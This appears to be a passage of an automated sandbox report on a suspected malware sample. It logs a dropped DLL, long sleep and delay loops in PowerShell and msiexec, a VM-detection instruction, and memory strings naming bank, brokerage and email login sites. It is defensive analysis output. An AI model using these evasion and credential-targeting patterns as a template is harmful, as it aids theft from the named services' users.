            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_3_23DE6B29 sldt word ptr [eax]5_3_23DE6B29
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598848Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598733Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596215Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596108Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595641Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595295Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594641Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594312Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5962Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3785Jump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 5496Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2272Thread sleep count: 7998 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2272Thread sleep count: 1849 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -599110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598848s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598733s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598625s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598516s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596215s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596108s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -596000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595891s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595766s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595641s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595295s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -594641s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -594531s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -594422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452Thread sleep time: -594312s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00405E6B FindFirstFileA,FindClose,0_2_00405E6B
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405427
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598848Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598733Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596215Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596108Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595641Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595295Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594641Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594312Jump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: powershell.exe, 00000002.00000002.1255613084.0000000005243000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\/r
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: svchost.exe, 00000004.00000002.2128877775.00000233FD655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2127485584.00000233FC025000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2129804635.000000000628E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
